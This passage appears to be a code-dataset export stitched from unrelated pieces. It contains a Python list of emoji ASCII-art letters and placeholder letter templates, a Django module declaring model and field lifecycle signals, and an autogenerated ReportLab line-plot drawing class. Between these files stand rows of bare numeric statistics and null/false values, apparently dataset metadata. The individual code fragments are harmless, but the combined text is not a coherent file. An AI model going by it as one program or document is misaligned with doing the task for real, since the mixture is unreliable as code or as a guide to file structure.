"\n💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛💛\n 💛💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n 💛💛 💛💛\n💛💛 💛💛\n",
"\n💙💙 💙💙\n 💙💙 💙💙\n 💙💙 💙💙\n 💙💙 💙💙\n 💙💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n",
"\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n💟💟💟💟💟💟💟\n💟💟💟💟💟💟💟\n",
"\n 💗💗💗💗\n 💗💗💗💗💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n💗💗 💗💗\n 💗💗💗💗💗💗\n 💗💗💗💗\n",
"\n 💙💙\n 💙💙💙\n💙💙 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙\n 💙💙💙💙\n 💙💙💙💙\n",
"\n 💟💟💟💟💟\n 💟💟💟💟💟💟\n💟💟 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟💟💟\n",
"\n 💛💛💛💛\n 💛💛💛💛💛\n💛💛 💛💛\n 💛💛\n 💛💛💛\n 💛💛💛\n 💛💛\n💛💛 💛💛\n 💛💛💛💛💛\n 💛💛💛💛\n",
"\n 💖💖\n 💖💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n 💖💖 💖💖\n💖💖 💖💖\n💖💖💖💖💖💖💖💖💖\n💖💖💖💖💖💖💖💖💖\n 💖💖\n 💖💖\n",
"\n💚💚💚💚💚💚\n💚💚💚💚💚💚\n💚💚\n 💚💚💚💚💚\n 💚💚💚💚💚\n 💚💚\n 💚💚\n💚💚 💚💚\n 💚💚💚💚💚\n 💚💚💚💚\n",
"\n 💜💜💜💜\n 💜💜💜💜💜\n💜💜\n\n💜💜\n💜💜💜💜💜💜\n💜💜💜💜💜💜💜\n💜💜 💜💜\n💜💜 💜💜\n 💜💜💜💜💜💜\n 💜💜💜💜\n",
"\n💗💗💗💗💗💗💗\n💗💗💗💗💗💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n 💗💗\n",
"\n 💙💙💙💙\n 💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n 💙💙💙💙💙💙\n 💙💙💙💙💙💙\n💙💙 💙💙\n💙💙 💙💙\n 💙💙💙💙💙💙\n 💙💙💙💙\n",
"\n 💟💟💟💟\n 💟💟💟💟💟💟\n💟💟 💟💟\n💟💟 💟💟\n 💟💟💟💟💟💟💟\n 💟💟💟💟💟💟\n 💟💟\n 💟💟\n 💟💟💟💟💟💟\n 💟💟💟💟\n",
]
itachiemoji = [
"\n {cj}\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}\n{cj}{cj}\n{cj}{cj}\n {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj} {cj}{cj}{cj}\n{cj}{cj}{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}{cj} {cj}{cj}\n{cj}{cj} {cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}\n",
"\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj} {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj} {cj}{cj}{cj}{cj}\n {cj}{cj}{cj} {cj}{cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n",
"\n{cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}\n {cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}\n {cj}{cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n {cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}\n{cj}{cj}\n\n{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
"\n {cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n{cj}{cj} {cj}{cj}\n{cj}{cj} {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}\n {cj}{cj}\n {cj}{cj}{cj}{cj}{cj}{cj}\n {cj}{cj}{cj}{cj}\n",
]
| 35.709016
| 484
| 0.206856
| 3,560
| 26,139
| 2.070506
| 0.108427
| 0.656085
| 0.692715
| 0.631665
| 0.753358
| 0.730159
| 0.724732
| 0.703975
| 0.703975
| 0.699769
| 0
| 0.015688
| 0.468381
| 26,139
| 731
| 485
| 35.757866
| 0.371978
| 0
| 0
| 0.548433
| 0
| 0.10114
| 0.742875
| 0.197253
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0be643dccc3fa31538ee1b3d5f3e6cca2630d725
| 962
|
py
|
Python
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
harshp8l/deep-learning-lang-detection
|
2a54293181c1c2b1a2b840ddee4d4d80177efb33
|
[
"MIT"
] | 84
|
2017-10-25T15:49:21.000Z
|
2021-11-28T21:25:54.000Z
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 5
|
2018-03-29T11:50:46.000Z
|
2021-04-26T13:33:18.000Z
|
data/train/python/0be643dccc3fa31538ee1b3d5f3e6cca2630d725signals.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 24
|
2017-11-22T08:31:00.000Z
|
2022-03-27T01:22:31.000Z
|
import django.dispatch
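# Custom lifecycle signals: a pre/post pair is sent around every create,
# update and delete of a dynamically managed model or field.
# Note: providing_args is purely informational and was removed in Django 4.0;
# on newer versions these would be plain django.dispatch.Signal() calls.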
pre_model_creation = django.dispatch.Signal(providing_args=['new_model'])
post_model_creation = django.dispatch.Signal(providing_args=['new_model'])
pre_model_update = django.dispatch.Signal(providing_args=['old_model','new_model'])
post_model_update = django.dispatch.Signal(providing_args=['old_model','new_model'])
pre_model_delete = django.dispatch.Signal(providing_args=['old_model'])
post_model_delete = django.dispatch.Signal(providing_args=['old_model'])
pre_field_creation = django.dispatch.Signal(providing_args=['new_field'])
post_field_creation = django.dispatch.Signal(providing_args=['new_field'])
pre_field_update = django.dispatch.Signal(providing_args=['old_field','new_field'])
post_field_update = django.dispatch.Signal(providing_args=['old_field','new_field'])
pre_field_delete = django.dispatch.Signal(providing_args=['old_field'])
post_field_delete = django.dispatch.Signal(providing_args=['old_field'])
| 35.62963
| 84
| 0.808732
| 131
| 962
| 5.541985
| 0.114504
| 0.250689
| 0.330579
| 0.479339
| 0.914601
| 0.914601
| 0.914601
| 0.914601
| 0.914601
| 0.330579
| 0
| 0
| 0.053015
| 962
| 26
| 85
| 37
| 0.796926
| 0
| 0
| 0
| 0
| 0
| 0.149688
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f0bae7d0503264e02103de20ed0f353027225814
| 33,385
|
py
|
Python
|
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_lineplots_sample1a.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String, PolyLine, Polygon
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
def __init__(self,width=400,height=200,*args,**kw):
Drawing.__init__(self,width,height,*args,**kw)
self.transform = (1,0,0,1,0,0)
self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,350,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,50,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(110,50,110,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(170,50,170,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(230,50,230,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(290,50,290,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(350,50,350,45,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,50,45)
v0.add(String(-2.5,-10,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,110,45)
v0.add(String(-2.5,-10,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,170,45)
v0.add(String(-2.5,-10,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,230,45)
v0.add(String(-2.5,-10,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,290,45)
v0.add(String(-2.5,-10,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,350,45)
v0.add(String(-2.5,-10,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,67.85714,45,67.85714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,85.71429,45,85.71429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,103.5714,45,103.5714,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,121.4286,45,121.4286,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,139.2857,45,139.2857,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,157.1429,45,157.1429,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,50)
v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,67.85714)
v0.add(String(-5,-4,'1',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,85.71429)
v0.add(String(-5,-4,'2',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,103.5714)
v0.add(String(-5,-4,'3',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,121.4286)
v0.add(String(-5,-4,'4',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,139.2857)
v0.add(String(-5,-4,'5',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,157.1429)
v0.add(String(-5,-4,'6',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
v0=self._nn(Group())
v0.transform = (1,0,0,1,45,175)
v0.add(String(-5,-4,'7',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
self.add(PolyLine(points=[110,67.85714,170,85.71429,200,67.85714,230,103.5714,290,139.2857],strokeColor=Color(1,0,0,1),strokeWidth=2,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
self.add(PolyLine(points=[110,85.71429,170,103.5714,200,85.71429,260,139.2857,290,157.1429],strokeColor=Color(0,0,1,1),strokeWidth=4,strokeLineCap=0,strokeLineJoin=1,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,110,67.85714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
